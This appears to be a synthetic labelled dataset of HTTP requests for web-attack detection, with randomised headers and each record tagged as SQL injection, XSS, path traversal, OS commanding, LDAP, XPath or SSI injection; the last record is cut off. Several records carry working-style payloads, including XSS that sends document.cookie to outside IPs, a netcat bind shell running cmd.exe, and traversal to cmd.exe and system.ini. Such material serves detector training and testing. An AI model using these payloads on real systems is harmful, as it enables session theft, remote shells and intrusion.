Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.0
Cache-Control: max-age=7464
Client-ip: 22.111.61.54
Cookie: oonEjnU=hhtpasseoeezwre;jNdexdotUzr=267656461
Cookie2: $Version="56"
Date: Sun, 30 May 04 06:24:02 GMT
ETag: W/"wqiL1g8LNgzIAAzcyrE"
Expect: tdtiTg
From: 92fxf@rrjet00.biz
If-Modified-Since: Fri, 19 Jun 09 06:34:04 CET
If-Unmodified-Since: Sun, 05 Dec 04 22:50:02 GMT
If-Match: "@yp7--orXcGeBrzj."
If-None-Match: "ijD3huhYH@y69I79kC"
If-Range: *
Max-Forwards: 9
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest realm
Range: 43152-,41540-0,9210-
Referer: /dydel.mdb
TE: trailers
Trailer: Accept-Encoding
User-Agent: crogolw6e4s
UA-CPU: StrongARM
UA-Disp: 2354,727,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 353x220
Via: 0.5 www.dndhu2.shtml
Transfer-Encoding: deflate
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 724 17.92.63.205 "uiDhIxbYiobgTemr" "Thu, 31 Jul 08 08:16:12 CET"
X-Forwarded-For: 104.165.218.9
X-Serial-Number: 312383203635
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49223
Start - Id: 41290
class: SqlInjection
GET /hxkcNR9x3iVgl5Y/8sX4P@J8gptF4NsDR/j2vshutdownn/evxw@7r9Tr9Ew/rt/hne/rm9csemao6aeor/d1rOYY/l9lztnuttlntsgtozn.swf?ltnz3RiejOlle=Mo&1Hm097childXgIOf=tK_dc4Dp-&@htpassFW5exec=+n+5at%3Clthi%3Fo%24eudDts&aXassPdncCB=eoPeeoo8hhpsswcN&faecn8ie=nf HTTP/1.0
Host: 5.0.168.79
Connection: close
Accept: image/gif;q=0.6, image/jpeg, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nBo4y-8nhcin;q=0.0, lqatoo-xhYi, an6ee-Rmryy;q=0.9, i8h-zm
Cache-Control: no-cache
Client-ip: 217.222.2.144
Cookie: e8atv='    ) UNION     ALL    SELECT    7 FROM   f6deheNerl    WHERE  (    ''  =';bweOtx4de=eKMc-nmXC;P-wselectmFQN_=9799076871
Cookie2: $Version="56"
Date: Mon, 23 Oct 06 15:10:40 CET
ETag: W/"g_lFTiKjT0lFJ077"
Expect: rhrei0jh
From: aeorh1@neavalu.uk
If-Modified-Since: Fri, 30 Jul 04 13:20:01 CET
If-Unmodified-Since: Sat, 30 Jun 07 12:54:44 GMT
If-Match: *
If-None-Match: "b1@d4Ji0BzXfVDCl@b90"
If-Range: Tue, 04 Jan 05 04:24:20 CET
Max-Forwards: 6
MIME-Version: 8.0
Pragma: nSetsT=Lrrt9Ous
Proxy-Authorization: dLgo omyaexl=hdrcn4ql
Authorization: 2rtxtn epBuihar=inice
Range: 9-769078
Referer: /eeToe.jpeg
TE: trailers
Trailer: Referer
User-Agent: Mozilla/9.1 (X11; U; Linux i586 6.5; Ip-tt; rv:1.7.4) Gecko/91517290
UA-CPU: MIPS
UA-Disp: 9646,8421,16
UA-OS: Windows NT
UA-Color: color8
Via: FTP/1.3 96.31.7.177, whtcan/8.5 www.epreah.htm, 5.3 111.39.9.250
Transfer-Encoding: gzip
Upgrade: 1aa8/1.9, huin/7.7, ykium/1.0
Warning: 162 61.46.214.238 "dojhremlmscrTog" "Mon, 17 Nov 08 10:56:02 GMT"
X-Forwarded-For: 90.26.199.114
X-Serial-Number: 672862
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41290
Start - Id: 45429
class: PathTransversal
POST /mifQoakaccess_logrk@D3CK/pFBwp-x@W/9t/it5euneeil.css? HTTP/1.0
Content-Length: 98
Content-Language: leeort
Content-Encoding: identity
Content-Location: http://www.oabyh.be/itSrHlhe/sshidIat/geyf/nrfrw.doc
Content-MD5: cHNvanN0czN4VHJhaDV5Sw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Oct 04 12:14:36 CET
Last-Modified: Thu, 19 Oct 06 21:17:24 GMT
Host: 14.144.91.67
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 102.25.110.183
Cookie: bnaaoUaqt3jne9=nziaun0qtr61;esfnitdiU=07
Cookie2: $Version="494"
Date: Fri, 18 Sep 09 02:41:53 UTC
ETag: W/"nr8@VlaLMddU-beuo"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Thu, 15 Mar 07 21:20:17 UTC
If-Unmodified-Since: Sat, 03 Mar 07 15:23:10 GMT
If-Match: "3@TpBQBkFB@3ZsxF"
If-None-Match: "b_EsV_ytGyaG@wdzjv"
If-Range: "05AvPoMcX.Y3y2XGhvV1"
Max-Forwards: 0435
MIME-Version: 4.4
Pragma: o1rsU=thle
Proxy-Authorization: Digest username="aierso"
Authorization: Kbobmp ele8=vlAT2
Range: -292636,082693-
Referer: http://www.4eto2.cz/ayaMTn.pl
TE: gzip;q=0.5,deflate,trailers
Trailer: If-None-Match
User-Agent: ieTfwfp http://www.yxc7.it
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 357x895
Via: HTTP/8.9 245.103.187.32, 4.5 www.Bhea.tiff
Transfer-Encoding: ocene; heml=hermhp
Upgrade: dtOesl/5.5, bnmms/6.9, ehjAL/3.5, hrt/2.4
Warning: 027 www.80Tmnqe.tiff "nrptaalt484raSb7" 
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 6520812020
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

artczb=..........................WINNTsystem.ini&ht9eot=kSCVk.&retseoeoheia2=9698&Tvv=45&hrffu=479

End - Id: 45429
Start - Id: 47674
class: XSS
GET /tr49_fN9RECV@2gNcnX_/passthruG2openW20U7amPhwtmp/rXUgWTLLBYC/sy3DdRzYB4NFHsS/9iu-NhstylexkMautoexec/0TO0YhaNR7R9szrB/sOZtGK.jpeg?cesr0but5kmtr=3499222&kgroup bydTqRlPlDq=t+en6dt3l&Ttc=69198&ze6hcaedcylrc=hymec&rRwtt65aym=9080738481&nc2hreicsngcq3=D%278s%7Clie&rcb=h&tidoylqhjoin=9589&be=604&opsNIIVw1M=01865856&ndqEbelfaifobwh=otr5yirc5&ofqtpt6h2Na=%3Cimg+++++src+%3D++++%22+++++ngontadech+++%22onmouseover++%3D%22+%5Bwindow.open%28%27http%3A%2F%2F65.61.145.53%2Fchitla.nsf%27%2Bdocument.cookie%29%3B%5D+%22%3E&nlebiTyhenem4=L1rtlIts0&wjriecarot=3305 HTTP/1.0
Host: 123.220.151.54
Connection: keep-alive
Accept: audio/*, video/mpeg, video/quicktime
Accept-Charset: big5, ks_c_5601-1987;q=0.4, x-mac-roman;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 39.154.184.38
Cookie: doiaCn9adloi=781977234;l9fltp=93961;O57v=Rusy
Cookie2: $Version="699"
Date: Sun, 24 Aug 08 08:53:24 CET
ETag: W/"z_T1tK75-Wf.Z._"
Expect: 6dleoav=hnlO
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Thu, 04 Jan 07 14:27:36 CET
If-Unmodified-Since: Wed, 28 Jan 09 03:46:14 CET
If-Match: "C1nWSvohfN1fmR4Gc"
If-None-Match: "50LT_@D2X3C0W8wFRuvs"
If-Range: *
Max-Forwards: 3
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: lsrc Ezipm=8oubz
Range: -017,-1,-32
Referer: /dshgagto.swf
TE: chunked
Trailer: From
User-Agent: 0trspeodth2e9so8q
UA-CPU: 68000
UA-Disp: 2630,1668,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 934x7117
Via: zoes/3.0 235.135.82.75
Transfer-Encoding: deflate
Upgrade: OceeiE/8.8, btin/1.3, wrUw/4.8, toehd/0.2, t0m4l/5.1
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47674
Start - Id: 42831
class: OsCommanding
GET /DS3t_Ek8vWo/rs1KwSiV_mBYt/fJG9tnbHomTGhbSim/dtwn/InhotjaeRfeesrnre4n/sG4s_yuGH2yOWgAQ-/oMfSYy13_51h.swf?ex=latf3irexenes&@4jZincludez=grs&whdl=mhtasbi7tsrunie&o4I9E=%7C++++shell%28+++++%22cmd++%2Fc++c%3AInetpubwwwrootMSISSnc.exe+++++-l+++++-p++++3927++-t++-e+++++cmd.exe+++%22+%29++%7C+%27&edEioeqM2ndauEe=7&8linrtewwmz=n%7E&i8N09ne6gsu=mmEstau&rdi=iiiaaiiergttqyo&mwtmin=hhetamd8ielils HTTP/1.1
Host: 120.138.19.89
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-9, cp-950;q=0.1, windows-1257;q=0.0, big5;q=0.3, x-mac-hebrew
Accept-Encoding: identity;q=0.5
Accept-Language: xlttoii-snufnba, b-waeme, fan-fg38, xn5tshr-ddonon
Cache-Control: only-if-cached
Client-ip: 188.218.7.177
Cookie: aeeBStd6nt2wpta=c3eli=mailsh;pcnar6enueuyxi=cflX;aue7=250820;SjOUAztj= (or?;esoN0bberssae=oGptcP;bae2btoslcdde=kG@U-fh-
Date: Thu, 03 Nov 05 02:37:08 UTC
ETag: "q16-PHnKh6UWzohm"
Expect: 100-continue
From: deCV@nnnan.ch
If-Modified-Since: Mon, 16 Nov 09 23:24:18 GMT
If-Unmodified-Since: Mon, 29 Jun 09 05:32:44 GMT
If-Match: "qI24.dZDibJe3hmEe"
If-None-Match: "pSry5L@RU1Njqt5w"
If-Range: Sat, 21 Jul 07 21:44:10 GMT
Max-Forwards: 3
MIME-Version: 5.9
Authorization: Basic c3RRbnJzbzppZGxSeDBsWQ==
Range: 2-3,62-,037879-912
Referer: /di2uest.jsp
TE: trailers,chunked
Trailer: Host
User-Agent: tMyLi.XfwH http://www.oNreds.com
UA-Color: color16
Via: HTTP/6.9 www.oNss.html:3, bte/6.5 168.41.44.75, HTTP/6.2 249.90.77.235
Transfer-Encoding: compress
Upgrade: NhTeWO/2.9, teisee/0.9
X-Forwarded-For: 209.98.157.41
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42831
Start - Id: 46885
class: XSS
PUT /trtuza/hmpo/ne3rUrPj./ie.nsf? HTTP/1.1
Content-Length: 198
Content-Language: ehfebs
Content-Encoding: gzip
Content-Location: http://www.51bseo0.ch/dtaaoRb/heiec/ni7yD/sNs8/rtia.msf
Content-MD5: ZHVza25nZXJ0b2FkaHVibQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Jul 07 10:26:36 CET
Last-Modified: Wed, 08 Aug 07 18:22:13 CET
Host: 37.130.179.59:62
Connection: keep-alive
Accept: image/*;q=0.2, audio/*, audio/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=12
Client-ip: 164.249.24.153
Cookie: maualhbou5yT=n1cucrTynudDhOx;x%uCjorOu_q=95160665;nrHp=U1bsHawanvIil;SjacceptjTv0dZVSHH=arRshhSoeo;tsuWt1eynUvm=sock_stream;imloeloaHednist=3803
Cookie2: $Version="4"
Date: Sat, 15 Apr 06 21:50:09 CET
ETag: "B_AWz7jKJ2frLcMjIR"
Expect: k3yxedi
From: nbfea3@yM2KA0.biz
If-Modified-Since: Wed, 14 Feb 07 12:17:54 CET
If-Unmodified-Since: Sun, 08 Jan 06 14:07:57 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 02 Mar 08 03:38:09 UTC
Max-Forwards: 289
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic Y2VsZ2luZTpmYW5vOUUz
Authorization: NTLM eXJvc2ExYWFpb25zaHRmYW9tZWVzcndpYW9pZnRkcWdhb3F1Zld1ZWFUekxhZA==
Range: -87,-41
Referer: http://www.lprl.cz/tfbgoats/urstak.sh
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.5 (compatible; MSIE 0.9; Open BSD i386; lsn5uT)
UA-CPU: Sparc
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: 1.2 www.daOrgscw.tiff:2, s4iyo/1.3 249.164.153.118, 0.1 41.12.15.67
Transfer-Encoding: gzip
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------
~~~~~: ~~~~~~~~~~~

yseo=n&iYN5hetmpk=836583&anN=<img   dynsrc  =   "    javascript:[document.location.replace('http://www.ntme.com/cgi-bin/onetri.cgi'+document.cookie);]    "    >

End - Id: 46885
Start - Id: 44418
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: www.irse.net:80
Connection: keep-alive
Accept: */*
Accept-Charset: koi8
Accept-Encoding: *
Accept-Language: me5jjet-6Sxqh, SthznE-iStn;q=0.6, arcit0Di-znnb;q=0.6, oalo-rnb, l-i6yngu;q=0.3
Cache-Control: min-fresh=1814
Client-ip: 211.226.85.152
Cookie: asj9rot=40;b6yzQ=790589;whm=5z;egtc=nsmm
Cookie2: $Version="45"
Date: Wed, 15 Jun 05 09:46:13 CET
ETag: W/"9DlqrmBByHGPWvxbgG"
Expect: qeSl8a=erci;preie
From: efawm@cnueo.st
If-Modified-Since: Mon, 05 Jun 06 02:15:41 UTC
If-Unmodified-Since: Tue, 02 Jan 07 01:10:37 GMT
If-Match: *
If-None-Match: "Mn5Mz2@cIHYZzIO8iZ0k"
If-Range: *
Max-Forwards: 074
MIME-Version: 6.2
Pragma: esGSwi=iteHEWe
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: Basic dHNldjo1YW1tb24=
Range: 6-02287,72753-
Referer: http://6nt7t.it/eAaauf/eijutgeb/xesr.txt
TE: deflate,gzip;q=0.6
Trailer: Warning
User-Agent: lneerRsrtstiTyte
UA-CPU: Sparc
UA-Disp: 321,8339,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6396x837
Via: r0as/4.4 200.35.86.134
Transfer-Encoding: compress
Upgrade: esoj5m/0.8
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 80.244.159.109
X-Serial-Number: 16197588346334119700
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44418
Start - Id: 47118
class: XSS
GET /feh6hersdyPtmu.tiff?ceYdd7=%3Cimg++src+++%3D%22livescript%3A%5Bwindow.open%28%27http%3A%2F%2F42.206.144.213%2Fto.aspx%27%2Bdocument.cookie%29%3B%5D+++++++%22++%3E HTTP/1.0
Host: www.huatUimis.com
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-874, x-mac-greek;q=0.6, x-mac-hebrew;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 111.27.185.154
Cookie: CmRcUhtaccesTnYIB=t;3eSbRtsrReas=7XVqfk7
Cookie2: $Version="0"
Date: Fri, 14 Aug 09 22:47:41 UTC
ETag: W/"2w0lEfvBfkDGQbZ22V20"
Expect: 100-continue
From: dy0mird@eelb.it
If-Modified-Since: Fri, 08 Jan 10 17:46:25 GMT
If-Unmodified-Since: Wed, 29 Jul 09 02:09:10 UTC
If-Match: *
If-None-Match: "3ODNwJzxbdL9X5VQGn"
If-Range: "pkvVXtr2O-4U7WTH"
Max-Forwards: 476
MIME-Version: 5.8
Pragma: 8=B
Proxy-Authorization: Digest qop=auth
Authorization: NTLM cnNzZ2Vhc3RxbnNlN3JwVWZ2YTl3bm50dHNjY3BzZXJud2U1MHh0bQ==
Range: 38-13,-4
Referer: http://www.82nuthAh.gov/zeewhR/r6as/horhsm7.php
TE: gzip,trailers
Trailer: Via
User-Agent: dDlo (ixoDgK7KX)
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: HTTP/0.9 146.105.44.113:2791
Transfer-Encoding: compress
Upgrade: pen/9.1, ccf/6.5
Warning: 086 126.99.38.140:0 "cofaxltfcL1" "Mon, 16 Jan 06 15:09:10 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47118
Start - Id: 35263
class: SqlInjection
GET /nW19h@sbkqmgI5k2bRu/wacctaerlohn/nfu/p8o/0mfak/ir3/y4bVd9/ax4NLWfzL1ZeI/wrannd/tiiltna8t2rrpehp/linkconnectrZ.9YxPhtpassvL@/7NeomdynoodewswAw.php?dechoUt-PM=As6nt+ksvt%7Cdoo&tpmyE=3599070&itCna=70&JAaefnzri5cxlh=teolecntcsEzdtmbp&Pcobject.rbw=8p%5Dl&kj3ewslnu=%27++%2B++%28+++++SELECT++TOP++++1+lviy+++FROM+++++8tf%29+++%2B++++%27&ra5h=obetFhe%7C%3Caeh6gd&pl0kf=ar%250wp-ahs&jsskybae=4d&vveehigice=981865&odm=passwd%5Dt25seobspositionoi&tssed=ter%5Dt%27hwgetrooero07&tSl9wnneoll=e+eeyhiaesebi%3Dzee HTTP/1.1
Host: 66.122.128.239
Connection: close
Accept: */*;q=0.8
Accept-Charset: cp-950;q=0.2, iso-8859-15;q=0.0
Accept-Encoding: 
Accept-Language: s-tnln;q=0.6, nehae-dji;q=0.7, aaTeet-2trqfcw;q=0.7, fna53O-et4ya;q=0.2
Cache-Control: max-age=7542
Client-ip: 109.198.163.157
Cookie: nvo=3arn;wtrmeueei=hks
Cookie2: $Version="7"
Date: Fri, 14 May 04 03:00:52 UTC
ETag: "bvEbhRuWJy1AnSCQb"
Expect: er37ac=rtaefe;celo
From: lpter@0feo.uk
If-Modified-Since: Wed, 07 Sep 05 04:20:40 UTC
If-Unmodified-Since: Sun, 05 Aug 07 13:08:51 UTC
If-Match: *
If-None-Match: "1yrJVAEuoc6NI.AOn"
If-Range: Thu, 01 Dec 05 14:56:45 CET
Max-Forwards: 4
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: a6br lfuumh=lyan
Range: 930-456,2355-
Referer: http://ba3lN.be/1ehh/jx3mtwol/tgecnl/nontw2.html
TE: chunked
Trailer: Referer
User-Agent: luWhebveiAahrh
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7179x0700
Via: FTP/6.1 175.120.5.47, EEu/9.4 137.254.188.168
Transfer-Encoding: compress
Upgrade: I8j/1.5, gc9ecr/7.1
Warning: 900 139.60.79.76 "ln9aeaneieNgnh6Hl" "Mon, 29 Jan 07 22:28:50 GMT"
X-Forwarded-For: 149.48.124.188
X-Serial-Number: 086505531477
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35263
Start - Id: 37201
class: LdapInjection
GET /7tnaeneogacsLiarm.mspx?HGkY=ooZkAyXnTmn&ln=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&rsIhggsc=dyTBruiUYGN&OlmAert=073153 HTTP/1.1
Host: www.nor1aCenyW.it:80
Connection: close
Accept: image/jpeg;q=0.8, video/*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: rgth-v;q=0.1, ass-mr0on6et;q=0.2
Cache-Control: max-age=32967
Client-ip: 91.239.79.80
Cookie: Esoclanua=etrrmneOnttqgeia;access_logUvsC4M9y=0h;3an5ltrtnjae=i;cse=54834;bn=3;ggliwe8sifo7=n-cqsc
Cookie2: $Version="0"
Date: Mon, 12 Jun 06 07:51:55 GMT
ETag: "JxWTfVpFr6A6Wmofqi"
Expect: 100-continue
From: eeae@rreIhhhha.biz
If-Modified-Since: Wed, 22 Oct 08 10:17:17 CET
If-Unmodified-Since: Sat, 04 Jul 09 09:00:24 GMT
If-Match: "UKV5qTybQXfzRvhAF_"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 2.5
Pragma: haeiaCO=rbti
Proxy-Authorization: Basic ZHdiZFdlOm9kaWdlVWF0
Authorization: Digest uri=/chnr.sh
Range: 605-286224
Referer: http://www.ieo8sem.org/Thdl/ezbida/yootsrju/e4eln/tsnu.php3
TE: trailers,deflate;q=0.6,deflate;q=0.0
Trailer: From
User-Agent: Mozilla/2.4 (Machintosh; U; PPC 9.8; bt-7v; rv:7.9.1) Gecko/52528198
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0874x8291
Via: 0utfcq/8.1 121.146.79.83:1604, FTP/6.1 www.aQ1Aesht.css:144, FTP/4.7 27.138.69.23:311
Transfer-Encoding: identity
Upgrade: resPct/8.2
Warning: 439 www.atI5eC.htm "nezEdRxtVnfooea" 
X-Forwarded-For: 209.47.70.154
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37201
Start - Id: 42873
class: OsCommanding
GET /YdPeF/nboaietehenien9ah/aKjBMGMHpKgRP..png?om=tWa4aYF&nniatSit=i&2bWFNbgsoundC=i&-ZevalWnph-_=tAKdtiticrii0joo&.TRalllogSQY_7=181.199.174.252+%7C+dir&b6rtihqroyia=89787&nwajetlct=wgh HTTP/1.0
Host: 10.52.63.201
Connection: close
Accept: text/plain, application/rtf;q=0.8
Accept-Encoding: 
Accept-Language: eeaehtM-9elooTra;q=0.6, 416irle-tnzx, anrir-Eh, eh-w
Cookie2: $Version="664"
Date: Sun, 01 Oct 06 01:10:20 GMT
Expect: 100-continue
If-Match: "WrK7_oiqfGVT@ZPe3UAC"
If-None-Match: "MebSu5iwL-jsyBK."
Max-Forwards: 6
Pragma: zphtork=q
Proxy-Authorization: NTLM dXR3aHRseWlvb3Q0MXdzZDVsMnNvZG9mcnNzaG9nc2s=
Authorization: oottam lr9c=hd5oe
Referer: /oimius/ofsIyot8/sudi/l4rErith/sfu8oo.swf
User-Agent: Mozilla/0.9 (compatible; MSIE 7.9; Open BSD i386; sr7s; id2us; si28e)
Via: HTTP/4.4 www.etcsi8ki.gif:6659
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"

null

End - Id: 42873
Start - Id: 45231
class: PathTransversal
GET /../../? HTTP/1.1
Host: 29.204.221.54
Connection: close
Accept: text/*;q=0.6, audio/basic;q=0.6
Accept-Charset: x-mac-japanese, x-mac-ce, utf-8;q=0.0, windows-1252;q=0.4
Accept-Encoding: 
Accept-Language: hedto-duooa3;q=0.5, uo0tLlrv-n4n
Cache-Control: no-transform
Client-ip: 230.213.176.141
Cookie: glinuata=tje_8U6i;ra6hcfvDvitr=250;hew6cy2=aaxert6;trfln=2435663;bh0ke2sek=88536033
Cookie2: $Version="1"
Date: Thu, 21 Apr 05 01:37:42 GMT
ETag: W/"HAjYQ@UH.6s769k_XZxi"
Expect: hslN
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Mon, 11 Apr 05 08:07:35 GMT
If-Unmodified-Since: Mon, 10 Apr 06 05:19:14 CET
If-Match: *
If-None-Match: "C.H7XAnMwTF16WeK"
If-Range: "Y-OlY2tjtiH81a87aA"
Max-Forwards: 3442
MIME-Version: 3.6
Pragma: yeaett=Nliowgxn
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM eUlsY0V0aHdZbndYRXVuVGc0c3RwODZub29TNE5uZW5ubnR0c3NjYWZjcnJ1TWQ=
Range: 220-5761,42620-
Referer: http://www.tuaFh.gov/tWataltl.swf
TE: trailers,chunked;q=0.2,trailers
Trailer: Expect
User-Agent: n5zjQWQC. http://www.auemhv.uk
UA-CPU: x86
UA-Disp: 675,5988,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2272x045
Via: 4.3 115.157.185.216, HTTP/2.0 www.d0etjU.jpg, 1.6 85.233.239.234
Transfer-Encoding: identity
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 706890452941318
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45231
Start - Id: 49900
class: XPathInjection
GET /lIpM5MVms/aimaa0/odnraebn/hyaulsiyzaet9unja/sMWiEo8hiZd0sqbz1F/8hentoa1dhsva2eet/inpxhIGocTI.aspx?antenm4rliesuts=7514&dm=36947167&bercibc=%28i+%3C++count%28mo%2Fchild%3A%3Atext%28%29%29+++and+++++j++++%3C+count%28mr%2Fchild%3A%3Acomment%28%29%29++++and+++k++++%3C+++++count%28on%2Fchild%3A%3A*%29+++++%29 HTTP/1.0
Host: 15.129.224.52:80
Connection: 9ferhnls
Accept: audio/*, audio/*;q=0.7, audio/x-wav;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: a-6;q=0.4, uul-t, gdTitiio-e8a3azd1;q=0.2
Cache-Control: max-age=17679
Client-ip: 20.51.109.18
Cookie: SoutoSehdirgneh= vs;L-FadminOXe=gc(objectcidl;lool=thCby;yy=o3fB;id7w2ONm=40;RrsreEr=sdropseAulsyql
Cookie2: $Version="8"
Date: Mon, 13 Feb 06 11:02:07 CET
ETag: "jMycFfwb78DBxCYj2-.i"
Expect: 100-continue
From: t9xyb@dtrmz.gov
If-Modified-Since: Wed, 23 Jun 04 22:59:53 CET
If-Unmodified-Since: Sun, 14 Sep 08 04:41:05 UTC
If-Match: *
If-None-Match: "n0uj1cgdyIb4xo_hZ"
If-Range: *
Max-Forwards: 3
MIME-Version: 6.4
Pragma: neetrl='alonm'
Proxy-Authorization: NTLM T2RhYW5lcnJobG1DcjVhZHJucjdlaGFwaWlzY21vM2V0Z3Ju
Authorization: NTLM Y3g3MXZxRHRwZmFEaGVQZGVvbmVlZWRkaXU2bmluY2Fkb2gzZWRyZW4=
Range: 794-
Referer: http://www.w0aigh.ch/onttC.swf
TE: deflate
Trailer: User-Agent
User-Agent: Mozilla/4.9 (Windows; U; Windows NT 6.7; oh-ux; rv:0.4.8) Gecko/75724356
UA-CPU: PowerPC
UA-Disp: 2831,824,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9591x1965
Via: 5.9 11.61.213.70:45602, 9.7 www.hdrMwlui.gif, 7.9 220.129.159.234
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 883 www.oeedEt.gif "90sw81n3tnalV" 
X-Forwarded-For: 49.36.115.120
X-Serial-Number: 87544886060
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49900
Start - Id: 40381
class: SSI
GET /oBgijs/enuLhbteoqt/nTR2z7jmiDo/vsn6lhIsDc8h9ss.nsf?fue0ijd=%3A%2BAlVresq%7CecewecxmliTb&gnesquwm=c8gqsNeutse&abkjs0aDpile=oSsinsert-&Rw=ess7r&6CMN7W9XQ=62&nunnnO=4342774&slhhl9jri9w=eBaO7oR0tA9st&ddbnt7nr=h%3EtyformxaEidl8et4&43bPand=630&ttenejcxCdDe4=35257352 HTTP/1.1
Host: 11.163.102.106
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: oe='nyr'
Cookie: wrecnr5ehoEb=<!--  #include virtual="c:\winnt\system.ini"   -->
Cookie2: $Version="44"
Date: Mon, 13 Jun 05 09:32:55 UTC
ETag: W/"WU_-78q-@WxIv3dXAb"
Expect: 100-continue
If-Modified-Since: Mon, 26 Dec 05 08:17:51 UTC
If-Unmodified-Since: Tue, 13 Sep 05 20:58:03 GMT
If-Match: "O8nEurRO7Qo@sHP8RY"
If-None-Match: *
If-Range: Thu, 01 Jan 09 01:43:09 GMT
Max-Forwards: 3
MIME-Version: 6.0
Pragma: el=aza
Proxy-Authorization: NTLM c2ZkYXNlNDdzeXdmdThiaUxhc2FlbmR0cXJ3aXRzZW90b3N1b2VCbw==
Referer: /Eiioe.mp3
TE: chunked;q=0.7
User-Agent: Mozilla/4.4 (Windows; U; Win98 4.8; ch-wf; rv:0.0.8) Gecko/98929157
UA-Disp: 2628,7679,8
Via: FTP/2.6 www.aa9cuamd.js
Transfer-Encoding: compress
Warning: 613 124.233.174.131 "srriLiad" 
X-Serial-Number: 976386691609
----: ----------------------------------------------

null

End - Id: 40381
Start - Id: 36454
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 236.211.223.184:14330
Connection: soe7
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.2
Cache-Control: max-age=205
Client-ip: 41.52.219.46
